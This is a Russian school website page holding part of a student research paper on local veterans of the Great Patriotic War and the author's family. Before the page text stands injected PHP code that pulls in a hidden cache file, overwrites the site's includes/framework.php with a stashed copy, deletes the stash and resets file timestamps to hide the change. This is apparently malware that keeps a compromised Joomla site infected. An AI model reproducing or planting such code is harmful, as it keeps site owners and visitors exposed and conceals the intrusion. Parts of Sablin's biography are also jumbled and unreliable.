$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Исследовательская работа «Наши земляки в годы Великой Отечественной войны» (к 70-летию Победы) - страница 3

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209881

На сайте

Сейчас 47 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Исследовательская работа «Наши земляки в годы Великой Отечественной войны» (к 70-летию Победы) - страница 3

Индекс материала
Исследовательская работа «Наши земляки в годы Великой Отечественной войны» (к 70-летию Победы)
страница 2
страница 3
Все страницы

 

 

 

 

Глава 3. Судьбы земляков – ветеранов войны.

 

         Абдешев Хайрулла (1925-1975) п. Акоба. На фронте: 1943 -1945. Воздушно-десантные войска, сержант. Награды: орден Слава 1 ст., орден Слава 2 ст., орден Славы 3 ст.

 

       В 1942 году был зачислен в учебный батальон, где готовили младших командиров разведывательных подразделений. В 1943 году новый отряд разведчиков (в том числе и Хайрулла) был послан на Украину.

 

         На подступах к Киеву отделению Абдешева было приказано разведать расположение огневых точек противника и взять пленных. Половина ночи ушла на то, чтобы осторожно добраться до переднего края противника. Подошли к населённому пункту Бравары, здесь проходили вражеские траншеи. Не теряя ни минуты дорогого предрассветного времени, группа захвата забросала боевое охранение врага гранатами, и Хайрулла первым прыгнул в траншею. Разведчики сумели захватить двух вражеских солдат, остальных уничтожили, пленных доставили к своим.

 

      Много было выполнено таких заданий. На груди отважного воина засверкали боевые награды, с том числе орден Славы 3 степени.

 

          Август 1944 года. Группе Абдешева снова приказано добыть «языка», притом срочно - в течение четырёх часов. Уложились разведчики в это время, а следом - новый приказ…Очередная ночь ушла на то, чтобы бесшумно перейти линию обороны. Разведчики взяли «языка», но к своим вернуться не могли – близился рассвет. Спрятались в лесочке, целый день провели в укрытии. Старались ни одним движение не выдать себя. Вернулись благополучно. Захваченный пленный дал важные показания.

 

         Было это в районе Ужгорода. 27 октября 1944 года Ужгород был взят нашими войсками. Многие бойцы и командиры получили высокие награды. Орден Славы 2 степени был вручен разведчику Хайрулле  Абдешеву.  А впереди были новые бои. И новые подвиги нашего земляка. На подступах к словацкому городу Моравска Острава отделению Абдешева пришлось выдержать неравный бой с фашистами. Вместе со взводом автоматчиков разведчики удержали  здесь плацдарм до прихода основных сил полка. Немцы несколько раз атаковали высоту, стремясь сбросить с неё наших бойцов. Но это им не удалось. Абдешев был ранен, но оставался в строю. Автоматным огнём он уничтожил в том бою более десятка гитлеровцев…

 

       Из таких маленьких эпизодов складывалась  общая Победа. Светлый День Победы разведчик Абдешев встретил в госпитале. После лечения вернулся в родные края, снова трудился в сельском хозяйстве. В 1950 году Абдешева пригласили в военкомат. Расспросили, где воевал, какие награды имеет. А через несколько дней его поздравили с новой наградой - орденом Славы I степени.

 

     Заслуженная награда нашла героя и в мирные дни. Отважный он был человек, до конца преданный Родине.

 

      Саблин  Иван Павлович из того поколения, которому образно говоря выпало прожить не одну, а целых три жизни. Первая- та, что до войны, вторая - годы фронтовых дорог. Третья – это всё то, что выпало после войны.

 

           И. П. Саблин родился 1918 году в Акбулакском районе в селе Новоалександровка в крестьянской семье. До призыва в армию работал в колхозе им. Демитрова на тракторе, числился в передовиках сельскохозяйственного производства. Достаток, радость труда, счастье пришли в семью Саблиных в годы укрепления колхозов. В 1939 году Иван Павлович надел военную форму, стал артиллеристом. Служил в артиллерийском полку в Ивановской области. Затем полк перебросили в Прибалтику. Войну застал в Литве. Война окончилась.

 

«Мирная жизнь началась сразу. Бывший воин сел на трактор, пахал, сеял, убирал хлеб. За доблесть в труде в 1957 году И. П. Саблин был награждён медалью «За освоение целинных и залежных земель». Также в 1942 он и его товарищи были награждены орденами Отечественной войны второй степени. А в 1944 году за спасение советского танка, за проявление смекалки и героизма Саблин и его боевые друзья были представлены к правительственной награде - ордену Отечественной войны второй степени.

 

         В 1960 году семья Саблиных переехала в Сагарчин. Иван Павлович трудился на разных работах, не раз поощрялся дирекцией совхоза. Награждён медалью « Ветеран труда».

 

 

Глава 4. Война в истории моей семьи.

 

На войне также воевали мои прадеды - Петров Александр Васильевич его дата рождения неизвестна, известен лишь год рождения 1923, место рождения Калининская область, Вышне-Волочский р-н, деревня Дуброво, воинское звание красноармеец, убит был 27.04.1942.

 

Литвинов Иван Ефтеевич год рождения 1908, место рождения Акбулакский  р-н, село Харьковка, воинское звание рядовой. Много лет подряд считалось, что он пропал без вести. Но несколько лет назад, благодаря интернету, мы узнали, что  в самом начале войны он попал в плен. Сохранилась карточка из немецкого концлагеря, из которой мы узнали о дате смерти - 31 августа 1941г.

 

Васильев Гаврил Алексеевич год рождения 1905, когда началась война, он работал на железной дороге путеобходчиком. И во время войны честно и ответственно трудился там же (на войну его не призвали, у него была своего рода бронь, он нужен был в тылу), восстанавливал железнодорожные пути в Бессарабии, был награжден медалями «За доблестный труд в ВОВ 1941-1945гг.», «За трудовое отличие».  Ушёл из жизни 1982 в связи с болезнью.

 

      И мои прабабушки: Петрова Нина - работала в годы войны на оборонном заводе и в 1993 году умерла от тяжелой болезни, Литвинова Прасковья Николаевна также была тружеником тыла.

 

И пусть я  очень мало знаю о своих предках, но я горжусь ими. Я знаю главное: никто из них не стал предателем Родины, не прятался от войны. Они, мои родные люди, не задумываясь, отдали жизни, ради будущего без войны, ради человечества, ради меня - их правнучки. Они, мои родные люди, трудились в тылу, как каждый советский  человек в то время, ковали счастье и победу для Родины, и всех нас.

 

Заключение.

 

            Дорогой  ценой заплатили наши земляки за Победу. В нашем селе чтят память земляков. Ежегодно 9 мая  у памятника Героям Великой Отечественной войны  проходит торжественный митинг. Проводится  «Вахта памяти», операция «Рассвет».

 

                 Мы поняли, что на сегодняшний день актуальность данной темы в том, что нашему поколению с каждым днём становится всё сложнее и сложнее узнать из воспоминаний очевидцев, как это было, так как ветеранов с каждым годом становится всё меньше и меньше. Чтобы не повторилась такая ужасная война, мы должны сделать все, что в наших силах. Как можно больше записать воспоминаний, рассказов, написанных либо самими ветеранами, либо со слов – детьми и внуками. Эту память мы должны сохранить и предать потомкам.  

 

         Считаем, что поставленная цель и задачи выполнены. Подтолкнул нас к написанию именно этой работы интерес к своей малой Родине.

 

Есть имена, и есть такие даты,-

 

Они нетленной сущности полны.

 

Мы в буднях перед ними виноваты,-

 

Не замолить по праздникам вины.

 

И  славословья музыкою громкой

 

Не заглушить их памяти святой.

 

И в наших будут жить они потомках,

 

Что, может, нас оставят за чертой.

 

А. Твардовский.

 

 

Список источников.

 

  1. Архивные документы из сети «Интернет»
  2. Газета «Степные Зори»
  3. Книга Славы и памяти Акбулакского района
  4. Книга памяти «Тыл и фронт – едины» Акбулакского района
  5. Фотоматериалы